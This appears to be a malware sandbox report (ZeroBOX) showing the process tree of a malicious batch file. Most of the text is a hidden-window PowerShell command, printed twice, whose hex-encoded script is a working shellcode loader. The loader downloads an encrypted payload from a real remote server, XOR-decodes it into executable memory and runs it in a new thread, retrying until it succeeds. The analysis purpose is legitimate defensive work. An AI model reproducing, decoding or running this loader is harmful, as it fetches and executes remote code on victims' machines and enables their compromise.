| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iHjkEoTtwJ" C:\Users\test22\AppData\Local\Temp\PMTRD.bat
2564
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\PMTRD.bat
  2636
  - cmd.exe C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
    2724
    - powershell.exe powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
      2808
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zucfn5_i.cmdline"
        2912
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESF647.tmp" "c:\Users\test22\AppData\Local\Temp\CSCF637.tmp"
        2968
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\l9fffhn5.cmdline"
        3012
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESF7FD.tmp" "c:\Users\test22\AppData\Local\Temp\CSCF7FC.tmp"
        3056
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8dsuuhnt.cmdline"
        1152
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESF9C2.tmp" "c:\Users\test22\AppData\Local\Temp\CSCF9B1.tmp"
        800
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\x_sns7up.cmdline"
        1356
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFB68.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFB57.tmp"
        320
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hhisrn0v.cmdline"
        2260
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFD0E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFD0D.tmp"
        2372
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ztglqo2w.cmdline"
        2516
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFEC3.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFEB3.tmp"
        2544
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\rktisogl.cmdline"
        2648
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES98.tmp" "c:\Users\test22\AppData\Local\Temp\CSC87.tmp"
        2756

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents